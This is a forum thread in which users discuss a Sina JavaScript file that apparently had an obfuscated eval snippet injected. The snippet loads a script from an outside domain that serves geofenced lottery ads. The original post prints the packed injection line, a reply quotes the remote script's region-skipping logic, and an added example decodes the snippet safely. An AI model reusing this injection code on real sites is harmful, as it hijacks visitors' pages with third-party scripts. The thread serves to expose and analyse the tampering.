Looks like one of Sina's JS files has been replaced

    wei193 · 2018-04-20 09:39:12 +08:00 · 8334 views

    Link to the original article: http://tech.sina.com.cn/it/2018-04-19/doc-ifzihnep8570976.shtml

    The replaced JS is here: http://n.sinaimg.cn/common/channelnav/js/nav.js

    The added code is here:

    eval(function(d,f,a,c,b,e){b=function(a){return a.toString(f)};if(!"".replace(/^/,String)){for(;a--;)e[b(a)]=c[a]||b(a);c=[function(a){return e[a]}];b=function(){return"\\w+"};a=1}for(;a--;)c[a]&&(d=d.replace(new RegExp("\\b"+b(a)+"\\b","g"),c[a]));return d}('2.8("<0 3=\\"4\\" 5=\\"6/7\\" 1=\\"9\\" a=\\"b://c.d/e/f.g\\"></0>");',17,17,"script charset document id wf type text javascript writeln gb2312 src https sohu999 com imgs sina js".split(" "),0,{}));
    

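    The reason I think it was hijacked: the domain the ad redirects to has no ICP filing, and I can't find out who registered it; it shows as registered through a proxy.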

    Addendum 1  ·  2018-04-20 13:45:57 +08:00
    The content of the JS has now been changed to
    11111111111111111111111111111111111111111111


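    As for how I found it: I have ABP installed and am used to a world without ads, so when an ad suddenly showed up, and a lottery one at that, I wanted to find out what kind of ad it was, and then noticed something was off...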
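
The packed snippet in the post above can be decoded without running it. The following is an added example, not part of the original post: it substitutes the packer's dictionary words back into the payload and reports script URLs outside a first-party allowlist. The function names and the `FIRST_PARTY` list are assumptions made for illustration, and only packer radixes up to 36 are handled.

```javascript
// Added example: decode a packer-style eval() wrapper without executing it.
// Sample copied from the post above; the decoder function body is shortened.
const SAMPLE = String.raw`eval(function(d,f,a,c,b,e){/* decoder body */}('2.8("<0 3=\\"4\\" 5=\\"6/7\\" 1=\\"9\\" a=\\"b://c.d/e/f.g\\"></0>");',17,17,"script charset document id wf type text javascript writeln gb2312 src https sohu999 com imgs sina js".split(" "),0,{}));`;

// Assumption: domains treated as first-party for the page under review.
const FIRST_PARTY = ["sina.com.cn", "sinaimg.cn"];

// Pull payload, radix, word count and dictionary out of the call's arguments.
function parsePacked(source) {
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),"([^"]*)"\.split\(" "\)/.exec(source);
  if (!m) return null;
  return {
    payload: m[1].replace(/\\(.)/g, "$1"), // undo string-literal escapes
    radix: Number(m[2]),
    count: Number(m[3]),
    words: m[4].split(" "),
  };
}

// Substitute each base-`radix` token with its dictionary word in one pass.
function unpack({ payload, radix, count, words }) {
  if (radix > 36) throw new RangeError("base-62 keys are not handled here");
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const key = i.toString(radix);
    table.set(key, words[i] || key); // empty slot: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (tok) => table.get(tok) ?? tok);
}

// Return absolute script URLs whose host is not on the allowlist.
function foreignScripts(code, allow = FIRST_PARTY) {
  const out = [];
  for (const m of code.matchAll(/src\s*=\s*\\?["']([^"'\\\s>]+)/gi)) {
    let host;
    try { host = new URL(m[1]).hostname; } catch { continue; } // relative URL
    if (!allow.some((d) => host === d || host.endsWith("." + d))) out.push(m[1]);
  }
  return out;
}

function analyze(source) {
  const packed = parsePacked(source);
  if (!packed) return { unpacked: null, foreign: [] };
  const unpacked = unpack(packed);
  return { unpacked, foreign: foreignScripts(unpacked) };
}

console.log(analyze(SAMPLE).foreign); // [ 'https://sohu999.com/imgs/sina.js' ]
```
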
    39 replies  ·  2018-04-23 13:45:19 +08:00
    #1 · huiyifyj · 2018-04-20 09:49:48 +08:00 via Android
    sohu999.com shows its DNS server is DNSPod
    emmm [:doge:]
    #2 · 580a388da131 · 2018-04-20 09:52:35 +08:00
    Saw it today too. Sichuan Telecom
    #3 · fadaixiaohai · 2018-04-20 09:55:15 +08:00
    Was it replaced by the ISP?
    #4 · autoxbc · 2018-04-20 10:10:12 +08:00
    Looks like an insider making some money on the side, but this eval packer is far too much of a giveaway; hand-splitting the URL would have been better
    #5 · 7654 · 2018-04-20 10:12:09 +08:00
    Haha, you could report Sina on suspicion of H&D&D
    #6 · LeungJZ · 2018-04-20 10:13:10 +08:00
    It's not that flashing green thing in the bottom-right corner, is it?
    #7 · M4ster · 2018-04-20 10:46:50 +08:00 · ❤️ 7
    Haha, looks like users in Beijing and Zhejiang are not to be messed with 🐶.

    https://sohu999.com/imgs/sina.js
    ``` javascript
    loadScript('https://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js', function() {
        // Skip visitors whose IP geolocates to Beijing or Zhejiang
        if (window.remote_ip_info.province == '北京' || window.remote_ip_info.province == '浙江') {
            return false
        } else {
            // inject the ad...
        }
    })
    ```
    #8 · fe619742721 · 2018-04-20 11:19:25 +08:00
    @M4ster Haha, reminds me of that incident where an HTTP hijack page ended up hijacking the State Council itself
    #9 · vuser · 2018-04-20 11:39:38 +08:00
    @wei193 How did you find it? 118 lottery
    #10 · cattrace · 2018-04-20 12:33:00 +08:00
    Impressive. Same question: how did you find it?
    #11 · janus77 · 2018-04-20 12:35:23 +08:00
    Shanghai Unicom has it too; DNS is 114
    #12 · artoostark · 2018-04-20 12:40:52 +08:00
    Guangzhou Dr. Peng has it too.
    #13 · flyz · 2018-04-20 13:17:13 +08:00 via Android
    Why does it show 1111111 when I open the JS file?
    #14 · myleon · 2018-04-20 13:19:00 +08:00
    It was still there a moment ago; after a refresh it turned into 11111111
    #15 · RiESA · 2018-04-20 13:28:39 +08:00
    Does whoever did it also read V2EX? It's actually gone
    #16 · xiaodongus · 2018-04-20 13:35:14 +08:00
    It has turned into 111111; looks like it was an insider, no doubt
    #17 · wei193 (OP) · 2018-04-20 13:36:08 +08:00
    @vuser Because I have ABP; I opened the page and found an ad, and a lottery one at that, so I wanted to get to the bottom of it
    #18 · blackhacker · 2018-04-20 14:05:49 +08:00
    This is pretty impressive. How was it done?
    #19 · orm · 2018-04-20 14:06:58 +08:00
    Looks like the Sina insider reads V2EX too
    #20 · zoujun3281 · 2018-04-20 14:15:49 +08:00
    @M4ster Probably Sina has offices in Beijing and Zhejiang
    #21 · zzmstring · 2018-04-20 14:26:33 +08:00
    The insider is among the people who have viewed this thread
    #22 · panlilu · 2018-04-20 14:35:05 +08:00
    If they get caught, will they go to jail?
    #23 · CloudnuY · 2018-04-20 14:49:20 +08:00 · ❤️ 1
    Even the ad-hijacking domain is on HTTPS, and your blogs still aren't?
    #24 · huiyifyj · 2018-04-20 14:52:58 +08:00 via Android
    @CloudnuY #23 That's a sharp angle
    #25 · boywang004 · 2018-04-20 15:00:39 +08:00
    I get why Beijing is not to be messed with... but which big shot is stationed in Zhejiang?
    #26 · wyx · 2018-04-20 15:10:50 +08:00
    @boywang004 Baldy Chiang
    #27 · betaShine · 2018-04-20 15:10:50 +08:00 via iPhone
    With Sina's traffic, that must bring in quite a bit of money (´▽`)
    #28 · jijiwaiwai · 2018-04-20 15:12:20 +08:00
    @M4ster
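    #29 · laoyuan · 2018-04-20 15:12:29 +08:00
    There's a whole supply chain behind this sort of thing: people who take the orders, people who plant the links. It could well be a group job, which actually makes it harder to investigate.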
    #30 · uucloud · 2018-04-20 15:15:05 +08:00
    This guy is in trouble. OP is awesome, very sharp
    #31 · php300 · 2018-04-20 15:26:07 +08:00
    There are too many bosses in Zhejiang who like to gamble! So they've settled in there too
    #32 · miyuki · 2018-04-20 16:42:12 +08:00 via Android
    LOL
    #33 · DeWhite · 2018-04-20 17:04:28 +08:00 via Android
    An insider making shady money; I think they pulled it for fear of getting caught.
    #34 · wujianxiong · 2018-04-20 17:08:30 +08:00
    These ads make so much money. Gray-market operations really do have to block first-tier cities
    #35 · zangev5 · 2018-04-20 17:37:19 +08:00 via iPhone
    Keen observation, boss
    #36 · TingHaiJamiE · 2018-04-20 22:04:34 +08:00
    A bold guess: the code is all under version control, so if it's an insider, they can still be traced, right...
    #37 · mingyun · 2018-04-22 14:31:32 +08:00
    OP has a good exploring spirit
    #38 · ShaoMing · 2018-04-22 19:41:48 +08:00
    Why leave out Beijing and Zhejiang of all places!
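    #39 · Lantian · 2018-04-23 13:45:19 +08:00
    @M4ster
    @ShaoMing
    Probably because Sina's headquarters is in Beijing and the company that handles this part of the advertising is in Shenzhen. Or rather, the company where the "insider" works is in Beijing or Zhejiang.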